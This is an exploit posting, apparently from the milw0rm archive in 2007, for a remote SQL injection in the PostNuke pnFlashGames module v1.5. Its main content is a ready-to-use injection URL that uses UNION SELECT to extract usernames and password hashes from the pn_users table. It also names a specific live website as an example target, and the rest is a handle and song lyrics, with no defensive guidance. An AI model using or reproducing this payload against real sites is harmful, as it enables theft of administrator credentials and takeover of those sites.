Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

Maran PHP Forum (forum_write. php) Remote Code Execution Vulnerability

JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability

GPB bulletin board Remote file include

From:	XORON <xorontr_(at)_gmail.com>
Date:	30.04.2007
Subject:	PostNuke pnFlashGames Module v1.5 REmote SQL Injection

============================================================

PostNuke pnFlashGames Module v1.5 REmote SQL Injection

============================================================

Bulan: xoron


xoron.biz

+

Love's the funeral of hearts

The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you

:(

============================================================

Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,
pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,
13/**/from/**/pn_users/**/where/**/pn_uid=2/*

============================================================

Example: http://andersonvision.com/PostNuke/
============================================================

# milw0rm.com [2007-04-28]